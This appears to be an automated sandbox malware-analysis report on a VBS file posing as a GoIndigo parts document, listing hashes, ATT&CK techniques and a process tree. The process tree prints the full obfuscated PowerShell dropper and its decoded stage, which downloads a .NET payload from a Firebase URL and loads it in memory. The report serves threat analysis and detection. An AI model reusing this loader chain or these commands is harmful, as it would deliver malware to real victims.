56c0fcdebcda39f9a98c7b4471aeee2e8e7389bf2e5874fa945fe3f61c4ac654

General

Target

GOINDIGO_PN#_Desc_&_Qty Details.vbs
Size

6.6MB
MD5

6776a1e5031d3e57bff6359bc884c1f3
SHA1

bb9883c15f718846f1e23744f09044fc6185f25f
SHA256

56c0fcdebcda39f9a98c7b4471aeee2e8e7389bf2e5874fa945fe3f61c4ac654
SHA512

7b0c36ffa6ffdf300cfe50539f096cbc3a0181b8a1632012c88bea3270cf239757c45b4f26a3aaf723b9bce29fdb22194ddd6351b669d2257fe34523fe1c1f81
SSDEEP

1536:7ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssV:SI

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2684	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2684	powershell.exe
2412	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2412	powershell.exe
2684	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2964 wrote to memory of 2412	2964	WScript.exe	30
PID 2964 wrote to memory of 2412	2964	WScript.exe	30
PID 2964 wrote to memory of 2412	2964	WScript.exe	30
PID 2412 wrote to memory of 2684	2412	powershell.exe	32
PID 2412 wrote to memory of 2684	2412	powershell.exe	32
PID 2412 wrote to memory of 2684	2412	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bw▒HM▒aQBj▒HQ▒I▒▒9▒C▒▒Jw▒w▒DE▒Jw▒7▒CQ▒ZgBp▒Ho▒YgBs▒C▒▒PQ▒g▒Cc▒JQBw▒Ho▒QQBj▒E8▒ZwBJ▒G4▒TQBy▒CU▒Jw▒7▒Fs▒QgB5▒HQ▒ZQBb▒F0▒XQ▒g▒CQ▒d▒Bi▒HQ▒ZgBi▒C▒▒PQ▒g▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBD▒G8▒bgB2▒GU▒cgB0▒F0▒Og▒6▒EY▒cgBv▒G0▒QgBh▒HM▒ZQ▒2▒DQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒g▒Cg▒TgBl▒Hc▒LQBP▒GI▒agBl▒GM▒d▒▒g▒E4▒ZQB0▒C4▒VwBl▒GI▒QwBs▒Gk▒ZQBu▒HQ▒KQ▒u▒EQ▒bwB3▒G4▒b▒Bv▒GE▒Z▒BT▒HQ▒cgBp▒G4▒Zw▒o▒Cc▒a▒B0▒HQ▒c▒Bz▒Do▒Lw▒v▒GY▒aQBy▒GU▒YgBh▒HM▒ZQBz▒HQ▒bwBy▒GE▒ZwBl▒C4▒ZwBv▒G8▒ZwBs▒GU▒YQBw▒Gk▒cw▒u▒GM▒bwBt▒C8▒dg▒w▒C8▒Yg▒v▒HI▒bwBk▒HI▒aQBh▒Gs▒Z▒▒t▒Dg▒N▒▒x▒DM▒Z▒▒u▒GE▒c▒Bw▒HM▒c▒Bv▒HQ▒LgBj▒G8▒bQ▒v▒G8▒LwBk▒Gw▒b▒▒l▒DI▒RgBk▒Gw▒b▒▒l▒DI▒M▒BI▒G8▒c▒Bl▒C4▒d▒B4▒HQ▒PwBh▒Gw▒d▒▒9▒G0▒ZQBk▒Gk▒YQ▒m▒HQ▒bwBr▒GU▒bg▒9▒DY▒MQBj▒Dg▒Mg▒5▒GY▒Ng▒t▒GU▒MQ▒5▒DY▒LQ▒0▒Dk▒ZQ▒4▒C0▒Yg▒0▒GY▒Zg▒t▒D▒▒N▒▒x▒DE▒Mw▒0▒DU▒Nw▒3▒GY▒ZgBl▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒B0▒GI▒d▒Bm▒GI▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DM▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒DI▒Nw▒0▒DQ▒MQBl▒DQ▒ZQ▒y▒GI▒ZQ▒w▒C0▒M▒▒w▒GM▒YQ▒t▒GU▒MQ▒2▒DQ▒LQ▒4▒GQ▒N▒Bi▒C0▒MwBi▒Dg▒YwBl▒DM▒NwBl▒D0▒bgBl▒Gs▒bwB0▒CY▒YQBp▒GQ▒ZQBt▒D0▒d▒Bs▒GE▒PwB0▒Hg▒d▒▒u▒HI▒YQB0▒FM▒Z▒Bl▒FI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒GY▒aQB6▒GI▒b▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒c▒Bz▒Gk▒YwB0▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$psict = '01';$fizbl = 'C:\Users\Admin\AppData\Local\Temp\GOINDIGO_PN#_Desc_&_Qty Details.vbs';[Byte[]] $tbtfb = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($tbtfb).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('27441e4e2be0-00ca-e164-8d4b-3b8ce37e=nekot&aidem=tla?txt.ratSdeR/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $fizbl , '_______________________-------------', $psict, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PTO53IE1R18YJW33BGRS.temp

Filesize
7KB

MD5
0bfae190abe8c5c3fbc4b2af95f521a3

SHA1
1b7fd5bd45f40d3e700fc2560f05acc01469bf59

SHA256
f4c7a1ee455a9bb5964723a405132357fd66e1f089b3b00dcdddc3912425f707

SHA512
c0803c9f44d10e7a9172a14ade0c0a5daea2766af718c9dc10f2777e8d89a206eee980e8bb78b7cfb01c32374589a5bb71563830aeb6b0fb002abcde69b70574

Download Submit
memory/2412-4-0x000007FEF59CE000-0x000007FEF59CF000-memory.dmp

Filesize
4KB

Download
memory/2412-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2412-6-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/2412-7-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp

Filesize
9.6MB

Download
memory/2412-8-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp

Filesize
9.6MB

Download
memory/2412-9-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp

Filesize
9.6MB

Download
memory/2412-11-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp

Filesize
9.6MB

Download
memory/2412-16-0x000007FEF5710000-0x000007FEF60AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing